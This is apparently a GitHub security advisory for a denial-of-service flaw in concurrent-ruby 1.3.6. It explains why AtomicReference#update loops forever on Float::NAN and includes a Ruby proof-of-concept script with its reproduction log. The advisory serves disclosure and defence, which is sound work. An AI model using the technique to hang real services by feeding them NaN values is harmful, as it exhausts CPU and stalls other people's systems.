CVE-2026-54904
ADVISORY - githubSummary
Summary
Concurrent::AtomicReference#update can enter a permanent busy retry loop when the current value is Float::NAN.
The issue is caused by the interaction between:
AtomicReference#update, which retries untilcompare_and_set(old_value, new_value)succeeds.- Numeric
compare_and_set, which checksold == old_valuebefore attempting the underlying atomic swap. - Ruby NaN semantics, where
Float::NAN == Float::NANis alwaysfalse.
As a result, once an AtomicReference contains Float::NAN, calling #update repeatedly evaluates the caller's block and never returns. In services that store externally derived numeric values in an AtomicReference, this can cause CPU exhaustion or permanent request/job hangs.
Version
Software: concurrent-ruby Version: 1.3.6 Commit: 7a1b78941c081106c20a9ca0144ac73a48d254ab
Details
AtomicReference#update retries until compare_and_set returns true:
def update
true until compare_and_set(old_value = get, new_value = yield(old_value))
new_value
end
For numeric expected values, compare_and_set uses numeric equality before attempting the underlying atomic compare-and-set:
def compare_and_set(old_value, new_value)
if old_value.kind_of? Numeric
while true
old = get
return false unless old.kind_of? Numeric
return false unless old == old_value
result = _compare_and_set(old, new_value)
return result if result
end
else
_compare_and_set(old_value, new_value)
end
end
When the stored value is Float::NAN, old_value = get returns NaN. The later comparison old == old_value is false because NaN is not equal to itself. compare_and_set therefore returns false every time. AtomicReference#update treats that as a failed concurrent update and retries forever.
This is reachable through the public Concurrent::AtomicReference API and does not require native extensions or undefined behavior.
PoC
#!/usr/bin/env ruby
# frozen_string_literal: true
require 'concurrent/atomic/atomic_reference'
require 'concurrent/version'
puts "ruby=#{RUBY_DESCRIPTION}"
puts "concurrent_ruby_version=#{Concurrent::VERSION}"
puts "poc=AtomicReference#update livelock when current value is Float::NAN"
ref = Concurrent::AtomicReference.new(Float::NAN)
attempts = 0
finished = false
worker = Thread.new do
ref.update do |_old_value|
attempts += 1
0.0
end
finished = true
end
sleep 0.25
puts "nan_update_attempts_after_250ms=#{attempts}"
puts "nan_update_finished=#{finished}"
puts "nan_update_worker_alive=#{worker.alive?}"
if worker.alive? && !finished && attempts > 1000
puts 'result=REPRODUCED busy retry loop; update did not complete'
else
puts 'result=NOT_REPRODUCED'
end
worker.kill
worker.join
control = Concurrent::AtomicReference.new(1.0)
control_attempts = 0
control_result = control.update do |old_value|
control_attempts += 1
old_value + 1.0
end
puts "control_update_result=#{control_result.inspect}"
puts "control_update_attempts=#{control_attempts}"
puts "control_update_final_value=#{control.value.inspect}"
Log evidence
ruby=ruby 2.6.10p210 (2022-04-12 revision 67958) [universal.arm64e-darwin25]
concurrent_ruby_version=1.3.6
poc=AtomicReference#update livelock when current value is Float::NAN
nan_update_attempts_after_250ms=1926016
nan_update_finished=false
nan_update_worker_alive=true
result=REPRODUCED busy retry loop; update did not complete
control_update_result=2.0
control_update_attempts=1
control_update_final_value=2.0
Impact
This is an application-level denial of service issue. If an application stores externally derived numeric data in a Concurrent::AtomicReference, an attacker or faulty upstream data source may be able to cause the stored value to become Float::NAN. Any later call to AtomicReference#update on that reference will spin indefinitely, repeatedly executing the update block and consuming CPU.
Credit
Pranjali Thakur - depthfirst (depthfirst.com)
Common Weakness Enumeration (CWE)
Loop with Unreachable Exit Condition ('Infinite Loop')
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